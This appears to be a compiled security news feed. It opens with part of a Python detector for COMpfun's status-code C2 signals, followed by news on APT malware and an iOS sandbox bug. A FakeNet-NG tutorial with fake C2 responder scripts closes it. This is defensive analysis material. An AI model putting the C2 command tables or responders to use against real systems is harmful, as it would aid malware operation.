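# Status -> command meaning, taken from the table in the report.
# 427 is not defined by any RFC, so seeing it at all is itself a strong signal.
COMMAND_STATUSES = {
    422: "uninstall (remove COM-hijacking persistence)",
    423: "install (create COM-hijacking persistence)",
    424: "fingerprint target",
    427: "fetch and execute new command",
    428: "propagate to USB devices",
    429: "enumerate network resources",
}
EXECUTE_SIGNAL = 402  # "Payment Required": run everything queued so far


@dataclass
class Alert:
    client: str
    server: str
    first_seen: str    # time of the first queued command status
    triggered_at: str  # time of the 402 that would execute them
    armed: List[str]   # commands the queued statuses correspond to


def parse_line(line: str) -> Tuple[str, str, str, int]:
    """Split one log line into (time, client, server, status)."""
    ts, client, server, status = line.split()
    return ts, client, server, int(status)


def detect(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per (client, server) pair each time a 402 follows at
    least one queued 422-429 status from that same pair."""
    # Mirrors the bot behaviour the report describes: command statuses are
    # stored as flags until 402 arrives; ordinary statuses in between
    # (200, 404, ...) do not clear them.
    pending: Dict[Tuple[str, str], List[Tuple[str, int]]] = defaultdict(list)
    alerts: List[Alert] = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        ts, client, server, status = parse_line(raw)
        key = (client, server)
        if status in COMMAND_STATUSES:
            pending[key].append((ts, status))
        elif status == EXECUTE_SIGNAL and pending[key]:
            queued = pending.pop(key)
            alerts.append(Alert(
                client=client,
                server=server,
                first_seen=queued[0][0],
                triggered_at=ts,
                armed=[COMMAND_STATUSES[s] for _, s in queued],
            ))
    return alerts


# Constructed sample log (host names are placeholders): 10.0.0.5 hits an
# ordinary rate limit (429 with no following 402, so no alert); 10.0.0.7
# gets "fingerprint" and "propagate to USB" queued, then a 402 executes them.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 cdn.example.net 200
10:00:02 10.0.0.5 api.example.net 429
10:00:03 10.0.0.5 api.example.net 200
10:00:10 10.0.0.7 placeholder-c2.test 424
10:00:11 10.0.0.7 placeholder-c2.test 200
10:00:12 10.0.0.7 placeholder-c2.test 428
10:00:13 10.0.0.7 placeholder-c2.test 402
10:00:14 10.0.0.7 placeholder-c2.test 200
"""


def run_sample() -> List[Alert]:
    """Run the detector over the constructed log above."""
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a.client} <- {a.server}: {len(a.armed)} command(s) queued "
              f"since {a.first_seen}, executed at {a.triggered_at}: {a.armed}")
```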

“The malware operators retained their focus on diplomatic entities and the choice of a visa-related application – stored on a directory shared within the local network – as the initial infection vector worked in their favor. The combination of a tailored approach to their targets and the ability to generate and execute their ideas certainly makes the developers behind COMPFun a strong offensive team.” concludes Kaspersky.

Pierluigi Paganini

(SecurityAffairs – Turla, malware)

The post Russian APT Turla’s COMpfun malware uses HTTP status codes to receive commands appeared first on Security Affairs.

New software enables existing sensors to detect ransomware

Engineers from SMU’s Darwin Deason Institute for Cybersecurity have developed software to detect ransomware attacks before attackers can inflict catastrophic damage. Ransomware is crippling cities and businesses all over the world, and the number of ransomware attacks have increased since the start of the coronavirus pandemic. Attackers are also threatening to publicly release sensitive data if ransom isn’t paid. The FBI estimates that ransomware victims have paid hackers more than $140 million in the last … More

The post New software enables existing sensors to detect ransomware appeared first on Help Net Security.

Businesses vulnerable to emerging risks have a gap in their insurance coverage

The majority of business decision makers are insured against traditional cyber risks, such as breaches of personal information, but most were vulnerable to emerging risks, such as malware and ransomware, revealing a potential insurance coverage gap, according to the Hanover Insurance Group. The report surveyed business decision makers about cyber vulnerabilities and risk mitigation efforts.

Insurance purchasing decisions influenced by media coverage

Most businesses surveyed indicated they had purchased cyber insurance, and more than 70% … More

The post Businesses vulnerable to emerging risks have a gap in their insurance coverage appeared first on Help Net Security.

US Government Exposes North Korean Malware

US Cyber Command has uploaded North Korean malware samples to the VirusTotal aggregation repository, adding to the malware samples it uploaded in February.

The first of the new malware variants, COPPERHEDGE, is described as a Remote Access Tool (RAT) "used by advanced persistent threat (APT) cyber actors in the targeting of cryptocurrency exchanges and related entities."

This RAT is known for its capability to help the threat actors perform system reconnaissance, run arbitrary commands on compromised systems, and exfiltrate stolen data.

TAINTEDSCRIBE is a trojan that acts as a full-featured beaconing implant with command modules and is designed to disguise itself as Microsoft's Narrator.

The trojan "downloads its command execution module from a command and control (C2) server and then has the capability to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration."

Last but not least, PEBBLEDASH is yet another North Korean trojan acting like a full-featured beaconing implant and used by North Korean-backed hacking groups "to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration."

It's interesting to see the US government take a more aggressive stance on foreign malware. Making samples public, so all the antivirus companies can add them to their scanning systems, is a big deal -- and probably required some complicated declassification maneuvering.

Me, I like reading the codenames.

Lots more on the US-CERT website.

New Ramsay malware allows exfiltrating files from air-gapped computers

Experts discovered a new strain of malware dubbed Ramsay that can infect air-gapped computers and steal sensitive data, including Word, PDF, and ZIP files.

Researchers from security firm ESET discovered a new advanced malware framework named Ramsay that appears to have been designed to infect air-gapped computers and exfiltrate sensitive data.

The malicious code collects sensitive files, including Word, PDF, and ZIP files, in a hidden storage folder, then waits for the opportunity to exfiltrate them.

“ESET researchers have discovered a previously unreported cyber-espionage framework that we named Ramsay and that is tailored for collection and exfiltration of sensitive documents and is capable of operating within air‑gapped networks.” reads the report published by ESET.

The malware was specifically designed to jump the air gap and reach computers within isolated networks to steal sensitive information.

The researchers found a sample of Ramsay after it was uploaded to VirusTotal from Japan; they then discovered further components and versions of the framework, which suggests the framework is still under active development.

Experts speculate that at least three variants of the malware exist, tracked as v1, v2.a, and v2.b. Ramsay v1 was first compiled in September 2019, and is also the least complex.

The v2.a and v2.b samples were compiled on March 8 and March 27, respectively; both include a rootkit component, but experts noticed that only v2.a implements spreading capabilities.

Experts report that the less complex versions of the malware are dropped by weaponized documents exploiting the RCE vulnerabilities CVE-2017-0199 and CVE-2017-11882.

The Ramsay v2.a is delivered using a fake installer for the 7-zip file compression utility.


Ramsay allows attackers to collect all Microsoft Word documents on the target computer; the most recent variants are also able to exfiltrate PDF files and ZIP archives on network drives and removable drives.

ESET researchers were not able to identify any Ramsay exfiltration module used by the malicious code.

ESET did not attribute the Ramsay malware to a specific threat actor; researchers only noticed some similarities with the Retro malware family employed by the DarkHotel APT group.

“Based on the different instances of the framework found Ramsay has gone through various development stages, denoting an increasing progression in the number and complexity of its capabilities. Developers in charge of attack vectors seem to be trying various approaches such as old exploits for Word vulnerabilities from 2017 as well as deploying trojanized applications.” concludes ESET.

“We interpret this as that developers have a prior understanding of the victims’ environment and are tailoring attack vectors that would successfully intrude into targeted systems without the need to waste unnecessary resources.”

Pierluigi Paganini

(SecurityAffairs – Ramsay malware, hacking)

The post New Ramsay malware allows exfiltrating files from air-gapped computers appeared first on Security Affairs.

Crooks continue to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

LokiBot had already been employed in Coronavirus-themed campaigns: in early April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

The COVID-19 themed phishing campaigns recently observed by Microsoft were using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC); the messages promise the latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign uses messages that pretend to be from a vendor asking for updated banking information to process payments because of the COVID-19 lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign; Microsoft users are automatically protected by Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continue to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.

Threat Roundup for May 1 to May 8

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Apr 24 and May 1. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

Read More



20200508-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for May 1 to May 8 appeared first on Cisco Blogs.


This is a good explanation of an iOS bug that allowed someone to break out of the application sandbox. A summary:

What a crazy bug, and Siguza's explanation is very cogent. Basically, it comes down to this:

  • XML is terrible.
  • iOS uses XML for Plists, and Plists are used everywhere in iOS (and MacOS).
  • iOS's sandboxing system depends upon three different XML parsers, which interpret slightly invalid XML input in slightly different ways.

So Siguza's exploit -- which granted an app full access to the entire file system, and more -- uses malformed XML comments constructed in a way that one of iOS's XML parsers sees its declaration of entitlements one way, and another XML parser sees it another way. The XML parser used to check whether an application should be allowed to launch doesn't see the fishy entitlements because it thinks they're inside a comment. The XML parser used to determine whether an already running application has permission to do things that require entitlements sees the fishy entitlements and grants permission.

This is fixed in the new iOS release, 13.5 beta 3.


Implementing 4 different parsers is just asking for trouble, and the "fix" is of the crappiest sort, bolting on more crap to check they're doing the right thing in this single case. None of this is encouraging.

More commentary. Hacker News thread.

Smashing Security #177: Elon Musk, Roblox, and Love Bug author found

What can X Æ A-12 Musk teach us about passwords? How did our guest finally hunt down in Manila the author of one of history’s biggest virus outbreaks? And what on earth is a hacker doing breaching Roblox security?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by technology journalist Geoff White.

Malware in Google Apps

Interesting story of malware hidden in Google Apps. This particular campaign is tied to the government of Vietnam.

At a remote virtual version of its annual Security Analyst Summit, researchers from the Russian security firm Kaspersky today plan to present research about a hacking campaign they call PhantomLance, in which spies hid malware in the Play Store to target users in Vietnam, Bangladesh, Indonesia, and India. Unlike most of the shady apps found in Play Store malware, Kaspersky's researchers say, PhantomLance's hackers apparently smuggled in data-stealing apps with the aim of infecting only some hundreds of users; the spy campaign likely sent links to the malicious apps to those targets via phishing emails. "In this case, the attackers used Google Play as a trusted source," says Kaspersky researcher Alexey Firsh. "You can deliver a link to this app, and the victim will trust it because it's Google Play."


The first hints of PhantomLance's campaign focusing on Google Play came to light in July of last year. That's when Russian security firm Dr. Web found a sample of spyware in Google's app store that impersonated a downloader of graphic design software but in fact had the capability to steal contacts, call logs, and text messages from Android phones. Kaspersky's researchers found a similar spyware app, impersonating a browser cache-cleaning tool called Browser Turbo, still active in Google Play in November of that year. (Google removed both malicious apps from Google Play after they were reported.) While the espionage capabilities of those apps were fairly basic, Firsh says that they both could have expanded. "What's important is the ability to download new malicious payloads," he says. "It could extend its features significantly."

Kaspersky went on to find tens of other, similar spyware apps dating back to 2015 that Google had already removed from its Play Store, but which were still visible in archived mirrors of the app repository. Those apps appeared to have a Vietnamese focus, offering tools for finding nearby churches in Vietnam and Vietnamese-language news. In every case, Firsh says, the hackers had created a new account and even Github repositories for spoofed developers to make the apps appear legitimate and hide their tracks.

Cybercriminals Are Exploiting the Covid-19 Pandemic

Cybercriminals are actively targeting Covid-19 hotspots with malware and phishing campaigns, according to a new report from Bitdefender.

The report, “Coronavirus-themed Threat Reports Haven’t Flattened the Curve,” shows a direct correlation between confirmed Covid-19 cases and malware attacks exploiting the crisis.

These findings confirm a similar report that showed a 30000% increase in Covid-19-themed attacks from January to March.

“Countries that have reported the largest number of Coronavirus-themed [scams] seem to have also been those hit hardest by the pandemic,” the report stated, showing a concurrent increase in both confirmed cases and malware attacks in South Africa in April as an example.

Data from the Bitdefender report also indicated a connection between an increase in phishing campaigns in areas where testing for Covid-19 has become available.

“[W]e can safely infer that people who get tested are interested in learning more about potential treatments, medicine, medical best practices, and maybe even other patient’s experiences… those spending more time online looking for information about COVID-19 are more likely to fall prey to scams and malware related to Coronavirus,” the report stated. “Receiving an email claiming to have new and interesting information about the pandemic with more exclusive information embedded within the attachment is the perfect lure.”

Read the full report here.

The post Cybercriminals Are Exploiting the Covid-19 Pandemic appeared first on Adam Levin.

FakeNet Genie: Improving Dynamic Malware Analysis with Cheat Codes for FakeNet-NG

As developers of the network simulation tool FakeNet-NG, reverse engineers on the FireEye FLARE team, and malware analysis instructors, we get to see how different analysts use FakeNet-NG and the challenges they face. We have learned that FakeNet-NG provides many useful features and solutions of which our users are often unaware. In this blog post, we will showcase some cheat codes to level up your network analysis with FakeNet-NG. We will introduce custom responses and demonstrate powerful features such as executing commands on connection events and decrypting SSL traffic.

Since its first release in 2016, we have improved FakeNet-NG by adding new features such as Linux support and content-based protocol detection. We recently updated FakeNet-NG with one of our most requested features: custom responses for HTTP and binary protocols.

This blog post offers seven "stages" to help you master different FakeNet-NG strategies. We present them in terms of common scenarios we encounter when analyzing malware. Feel free to skip to the section relevant to your current analysis and/or adapt them to your individual needs. The stages are presented as follows:

  1. Custom File Responses
  2. Custom Binary Protocols
  3. Custom HTTP Responses
  4. Manual Custom Responses
  5. Blacklisting Processes
  6. Executing Commands on Connection Events
  7. Decrypting SSL Traffic

Read on to upgrade your skill tree and become a FakeNet-NG pro!

Before You Start: Configuring FakeNet-NG

Here is a quick reference for FakeNet-NG configurations and log data locations.

  1. Configuration files are in fakenet\configs. You can modify default.ini or copy it to a new file and point FakeNet-NG to the alternate configuration with -c. Ex: -c custom.ini.
  2. Default files are at fakenet\defaultFiles and Listener implementations are at fakenet\listeners.
  3. The fakenet\configs\default.ini default configuration includes global configuration settings and individual Listener configurations.
  4. Custom response configuration samples are included in the directory fakenet\configs in the files, sample_custom_response.ini, and sample_raw_response.txt.
  5. The install location for FakeNet-NG in FLARE VM is C:\Python27\lib\site-packages\fakenet. You will find the subdirectories containing the defaultFiles, configs, and listeners in this directory.
  6. In FLARE VM, FakeNet-NG packet capture files and HTTP requests can be found on the Desktop in the fakenet_logs directory.

Stage 1: Custom File Responses

As you may have noticed, FakeNet-NG is not limited to serving HTML pages. Depending on the file type requested, FakeNet-NG can serve PE files, ELF files, JPG, GIF, etc. FakeNet-NG is configured with several default files for common types and can also be configured to serve up custom files. The defaultFiles directory contains several types of files for standard responses. For example, if malware sends an FTP GET request for evil.exe, FakeNet-NG will respond with the file defaultFiles\FakeNetMini.exe (the default response for .exe requests). This file is a valid Portable Executable file that displays a message box. By providing an actual PE file, we can observe the malware as it attempts to download and execute a malicious payload. An example FTP session and subsequent execution of the downloaded default file is shown in Figure 1.

Figure 1: Using FTP to download FakeNet-NG's default executable response

Most requests are adequately handled by this system. However, malware sometimes expects a file with a specific format, such as an image with an embedded PowerShell script, or an executable with a hash appended to the file for an integrity check. In cases like these, you can replace one of the default files with a file that meets the malware’s expectation. There is also an option in each relevant Listener's configuration (Listeners are the modules that implement network protocols) to modify the defaultFiles path. This allows FakeNet-NG to serve different files without overwriting or modifying default data. A customized FakeNet.html file is shown in Figure 2.

Figure 2: Modify the default FakeNet.html file to customize the response

Stage 2: Custom Binary Protocols

Many malware samples implement custom binary protocols which require specific byte sequences. For example, malware in the GH0ST family may require each message to begin with a signature such as "GH0ST". The default FakeNet-NG RawListener responds to unknown requests with an echo, i.e. it sends the same data that it has received. This behavior is typically sufficient. However, in cases where a custom response is required, you can still send the data the malware expects.

Custom TCP and UDP responses are now possible with FakeNet-NG. Consider a hypothetical malware sample that beacons the string “Hello” to its command and control (C2) server and waits for a response packet that begins with “FLARE” followed by a numeric command (0-9). We will now demonstrate several interesting ways FakeNet-NG can handle this scenario.

Static Custom Response

You can configure how the TCP and/or UDP Raw Listeners respond to traffic. In this example we tell FakeNet-NG how to respond to any TCP raw request (no protocol detected). First uncomment the Custom configuration option in the RawTCPListener section of fakenet/configs/default.ini as illustrated in Figure 3.

Enabled:     True
Port:        1337
Protocol:    TCP
Listener:    RawListener
UseSSL:      No
Timeout:     10
Hidden:      False
# To read about customizing responses, see docs/
Custom:    sample_custom_response.ini

Figure 3: Activate custom TCP response

Next configure the TcpRawFile custom response in fakenet\configs\sample_custom_response.ini as demonstrated in Figure 4. Make sure to comment-out or replace the default RawTCPListener instance.

InstanceName:     RawTCPListener
ListenerType:     TCP
TcpRawFile:       flare_command.txt

Figure 4: TCP static custom response specifications

Create the file fakenet\configs\flare_command.txt with the content FLARE0. TCP responses will now be generated from the contents of the file.

Dynamic Custom Response

Perhaps you want to issue commands dynamically rather than committing to a specific command in flare_command.txt. This can be achieved programmatically. Configure the TcpDynamic custom response in fakenet\configs\sample_custom_response.ini as demonstrated in Figure 5. Make sure to comment-out or replace the existing RawTCPListener instance.

InstanceName:     RawTCPListener

Figure 5: TCP dynamic custom response specifications

The file fakenet\configs\ can be used as a template for our dynamic response file. We modify the HandleTcp() function and produce the new file fakenet\configs\ as illustrated in Figure 6. Now you can choose each command as the malware executes. Figure 7 demonstrates issuing commands dynamically using this configuration.

import socket

# Python 2 syntax (raw_input, str-as-bytes), matching the Python27 install in FLARE VM

def HandleTcp(sock):
    """Dynamic TCP handler: prompt the analyst for each command the sample expects."""
    while True:
        data = None
        try:
            data = sock.recv(1024)
        except socket.timeout:
            pass

        # No data (socket closed or timed out): stop handling this connection
        if not data:
            break

        # Build the 'FLARE<n>' reply the hypothetical sample waits for and send it
        resp = raw_input('\nEnter a numeric command: ')
        command = bytes('FLARE' + resp + '\n')
        sock.sendall(command)

Figure 6: TCP dynamic response script

Figure 7: Issue TCP dynamic commands
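Before loading a dynamic handler into FakeNet-NG it helps to exercise it offline. The following is an added example, not code from the FireEye post or the FakeNet-NG project: it generalizes the Figure 6 handler so the commands come from a scripted list instead of raw_input(), runs it against a constructed stand-in for the sample over a socketpair, and has the stand-in parse the FLARE<n> replies the way the text describes. It assumes Python 3; the "Hello" beacon, the reply format and the echo-on-unexpected-data behaviour come from the text, while make_handler, fake_sample and run_exchange are names I chose for this check.

```python
import socket
import threading

# Constructed protocol of the hypothetical sample from the text:
# the beacon is "Hello", the fake C2 answers "FLARE<digit>\n".
BEACON = b"Hello"


def make_handler(commands):
    """Build a HandleTcp-style handler that replies with scripted commands
    instead of prompting with raw_input(), so it can be tested offline.
    `commands` is an iterable of single-digit strings, consumed in order."""
    queue = list(commands)

    def HandleTcp(sock):
        sent = []
        while True:
            try:
                data = sock.recv(1024)
            except socket.timeout:
                break
            if not data:  # peer closed the connection
                break
            if data != BEACON:
                # Unexpected beacon: echo it back, as the stock RawListener would
                sock.sendall(data)
                continue
            if not queue:  # scripted commands exhausted
                break
            cmd = queue.pop(0)
            assert cmd.isdigit() and len(cmd) == 1, "protocol allows 0-9 only"
            resp = ("FLARE" + cmd + "\n").encode()
            sock.sendall(resp)
            sent.append(resp)
        return sent

    return HandleTcp


def fake_sample(sock, rounds):
    """Stand-in for the malware side: beacon, read a reply, parse the command."""
    received = []
    for _ in range(rounds):
        sock.sendall(BEACON)
        reply = sock.recv(1024)
        if not reply.startswith(b"FLARE") or len(reply) < 7:
            raise ValueError("malformed C2 reply: %r" % reply)
        received.append(int(reply[5:6]))
    return received


def run_exchange(commands):
    """Run the handler and the fake sample over a socketpair and return the
    list of numeric commands the sample side parsed out of the replies."""
    server, client = socket.socketpair()
    server.settimeout(2)
    client.settimeout(2)
    result = {}

    def serve():
        result["sent"] = make_handler(commands)(server)

    t = threading.Thread(target=serve)
    t.start()
    try:
        received = fake_sample(client, len(commands))
    finally:
        client.close()  # an empty recv() tells the handler to stop
    t.join()
    server.close()
    return received


if __name__ == "__main__":
    print(run_exchange(["0", "3", "9"]))
```

Only the inner HandleTcp matches the calling convention FakeNet-NG uses for a TcpDynamic file; the wrapper and fake_sample exist purely for the offline check, and the scripted list can be swapped back for raw_input() once the framing is known to be right.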

Stage 3: Custom HTTP Responses

Malware frequently implements its own encryption scheme on top of the popular HTTP protocol. For example, your sample may send an HTTP GET request to /comm.php?nonce=<random> and expect the C2 server response to be RC4 encrypted with the nonce value. This process is illustrated in Figure 8. How can we easily force the malware to execute its critical code path to observe or debug its behaviors?

Figure 8: Malware example that expects a specific key based on beacon data

For cases like these we recently introduced support for HTTP custom responses. Like TCP custom responses, the HTTPListener also has a new setting named Custom that enables dynamic HTTP responses. This setting also allows FakeNet-NG to select the appropriate responses matching specific hosts or URIs. With this feature, we can now quickly write a small Python script to handle the HTTP traffic dynamically based upon our malware sample.

Start by uncommenting the Custom configuration option in the HTTPListener80 section as illustrated in Figure 9.

Enabled:     True
Port:        80
Protocol:    TCP
Listener:    HTTPListener
UseSSL:      No
Webroot:     defaultFiles/
Timeout:     10
#ProcessBlackList: dmclient.exe, OneDrive.exe, svchost.exe, backgroundTaskHost.exe, GoogleUpdate.exe, chrome.exe
DumpHTTPPosts: Yes
DumpHTTPPostsFilePrefix: http
Hidden:      False
# To read about customizing responses, see docs/
Custom:    sample_custom_response.ini

Figure 9: HTTP Listener configuration

Next configure the HttpDynamic custom response in fakenet\configs\sample_custom_response.ini as demonstrated in Figure 10. Make sure to comment-out or replace the default HttpDynamic instance.

ListenerType:     HTTP
HttpURIs:         comm.php

Figure 10: HttpDynamic configuration

The file fakenet\configs\ can be used as a template for our dynamic response file. We modify the HandleRequest() function as illustrated in Figure 11. FakeNet-NG will now encrypt responses dynamically with the nonce.

import socket
from arc4 import ARC4

# To read about customizing HTTP responses, see docs/

def HandleRequest(req, method, post_data=None):
    """Sample dynamic HTTP response handler.

    req : BaseHTTPServer.BaseHTTPRequestHandler
        The BaseHTTPRequestHandler that received the request
    method: str
        The HTTP method, either 'HEAD', 'GET', 'POST' as of this writing
    post_data: str
        The HTTP post data received by calling `` against the
        BaseHTTPRequestHandler that received the request.
    """
    response = 'Ahoy\r\n'

    # The sample keys RC4 with the nonce it sent in the query string
    nonce = req.path.split('=')[1]
    arc4 = ARC4(nonce)
    response = arc4.encrypt(response)

    # Write status, headers and the encrypted body back to the sample
    req.send_response(200)
    req.send_header('Content-Length', len(response))
    req.end_headers()
    req.wfile.write(response)

Figure 11: Dynamic HTTP request handler
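To confirm that a handler like Figure 11 produces something the sample can actually decrypt, the following added example (mine, not from the post or the FakeNet-NG project) implements the same nonce-keyed RC4 scheme with a pure-Python RC4 in place of the arc4 package, pulls the nonce out of the query string with proper URL parsing instead of split('='), and then decrypts the body the way the sample would. It assumes Python 3; FakeRequest is a constructed stand-in for BaseHTTPRequestHandler, and the /comm.php?nonce=... path is the one from the text. RC4 appears only because the hypothetical sample uses it; it is the sample's scheme being mirrored, not a cipher chosen to protect anything.

```python
import io
from urllib.parse import urlparse, parse_qs


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling plus PRGA). Encrypt and decrypt are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nonce_from_path(path: str) -> bytes:
    """Extract the nonce from /comm.php?nonce=<value>; fail loudly on anything else,
    which is what you want from a fake C2 while you are still learning the protocol."""
    values = parse_qs(urlparse(path).query).get("nonce")
    if not values or not values[0]:
        raise ValueError("no nonce in request path: %r" % path)
    return values[0].encode()


class FakeRequest:
    """Constructed stand-in for BaseHTTPRequestHandler: records what the handler sends."""

    def __init__(self, path):
        self.path = path
        self.status = None
        self.headers = {}
        self.wfile = io.BytesIO()

    def send_response(self, code):
        self.status = code

    def send_header(self, name, value):
        self.headers[name] = value

    def end_headers(self):
        pass


def HandleRequest(req, method, post_data=None):
    """Handler in the shape FakeNet-NG calls: RC4-encrypt the command with the nonce as key."""
    key = nonce_from_path(req.path)
    body = rc4(key, b"Ahoy\r\n")
    req.send_response(200)
    req.send_header("Content-Length", str(len(body)))
    req.end_headers()
    if method != "HEAD":  # HEAD gets headers only, per HTTP semantics
        req.wfile.write(body)


def sample_side_decrypt(path: str) -> bytes:
    """Run the handler on a constructed request and decrypt the body as the sample would."""
    req = FakeRequest(path)
    HandleRequest(req, "GET")
    if req.status != 200:
        raise RuntimeError("handler refused request")
    return rc4(nonce_from_path(path), req.wfile.getvalue())


if __name__ == "__main__":
    print(sample_side_decrypt("/comm.php?nonce=abc123"))
```

For a real HttpDynamic file only rc4, nonce_from_path and HandleRequest are needed; FakeRequest and sample_side_decrypt are the offline harness. If the sample's key derivation turns out to be more involved than "the raw nonce string", nonce_from_path is the one place to change it, and the round-trip check will show immediately whether the new derivation still matches.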

Stage 4: Manual Custom Responses

For even more flexibility, the all-powerful networking utility netcat can be used to stand in for FakeNet-NG listeners. For example, you may want to use netcat to act as a C2 server and issue commands dynamically during execution on port 80. Launch a netcat listener before starting FakeNet-NG, and traffic destined for the corresponding port will be diverted to the netcat listener. You can then issue commands dynamically using the netcat interface as seen in Figure 12.

Figure 12: Use ncat.exe to manually handle traffic

FakeNet-NG's custom response capabilities are diverse. Read the documentation to learn how to boost your custom response high score.

Stage 5: Blacklisting Processes

Some analysts prefer to debug malware from a separate system. There are many reasons to do this; most commonly to preserve the IDA database and other saved data when malware inevitably corrupts the environment. The process usually involves configuring two virtual machines on a host-only network. In this setup, FakeNet-NG intercepts network traffic between the two machines, which renders remote debugging impossible. To overcome this obstacle, we can blacklist the debug server by instructing FakeNet-NG to ignore traffic from the debug server process.

When debugging remotely with IDA Pro, the standard debug server process for a 32-bit Portable Executable is win32_remote.exe (or dbgsrv.exe for WinDbg). All you need to do is add the process names to the ProcessBlackList configuration as demonstrated in Figure 13. Then, the debug servers can still communicate freely with IDA Pro while all other network traffic is captured and redirected by FakeNet-NG.

# Specify processes to ignore when diverting traffic. Windows example used here.
ProcessBlackList: win32_remote.exe, dbgsrv.exe

Figure 13: Modified configs/default.ini to allow remote debugging with IDA Pro

Blacklisting is also useful for keeping noisy processes from polluting the network traffic Fakenet-NG captures. Examples include processes that attempt to update the Windows system or other malware analysis tools.

Additional settings are available for blacklisting ports and hosts. Please see the README for more details about blacklisting and whitelisting.

Stage 6: Executing Commands on Connection Events

Fakenet-NG can be configured to execute commands when a connection is made to a Listener. For example, this option can be used to attach a debugger to a running sample upon a connection attempt. Imagine a scenario where we analyze the packed sample named Lab18-01.exe from the Practical Malware Analysis labs. Using dynamic analysis, we can see that the malware beacons to its C2 server over TCP port 80 using the HTTP protocol as seen in Figure 14.

Figure 14: Malware beacons to its C2 server over TCP port 80

Wouldn’t it be nice if we could magically attach a debugger to Lab18-01.exe when a connection is made? We could speedrun the sample and bypass the entire unpacking stub and any potential anti-debugging tricks the sample may employ.

To configure Fakenet-NG to launch and attach a debugger to any process, modify the [HTTPListener80] section in the fakenet\configs\default.ini to include the ExecuteCmd option. Figure 15 shows an example of a complete [HTTPListener80] section.

Enabled:     True
Port:        80
Protocol:    TCP
Listener:    HTTPListener
UseSSL:      No
Webroot:     defaultFiles/
Timeout:     10
DumpHTTPPosts: Yes
DumpHTTPPostsFilePrefix: http
Hidden:      False
# Execute x32dbg -p {pid} to attach a debugger. {pid} is filled in automatically by Fakenet-NG
ExecuteCmd: x32dbg.exe -p {pid}

Figure 15: Execute command option to run and attach x32dbg

In this example, we configure the HTTPListener on port 80 to execute the debugger x32dbg.exe, which will attach to a running process whose process ID is determined at runtime. When a connection is made to HTTPListener, FakeNet-NG will automatically replace the string {pid} with the process ID of the process that makes the connection. For a complete list of supported variables, please refer to the Documentation.

Upon restarting Fakenet-NG and running the sample again, we see x32dbg launch and automatically attach to Lab18-01.exe. We can now use memory dumping tools such as Scylla or the OllyDumpEx plugin to dump the executable and proceed to static analysis. This is demonstrated in Figure 16 and Figure 17.

Figure 16: Using FakeNet-NG to attach x32dbg to the sample (animated)

Figure 17: Fakenet-NG executes x32dbg upon connection to

Stage 7: Decrypting SSL Traffic

Often malware uses SSL for network communication, which hinders traffic analysis considerably as the packet data is encrypted. Using Fakenet-NG's ProxyListener, you can create a packet capture with decrypted traffic. This can be done using the protocol detection feature.

The proxy can detect SSL, and "man-in-the-middle" the socket in SSL using Python's OpenSSL library. It then maintains full-duplex connections with the malware and with the HTTP Listener, with both sides unaware of the other. Consequently, there is a stream of cleartext HTTP traffic between the Proxy and the HTTP Listener, as seen in Figure 18.

Figure 18: Cleartext streams between Fakenet-NG components

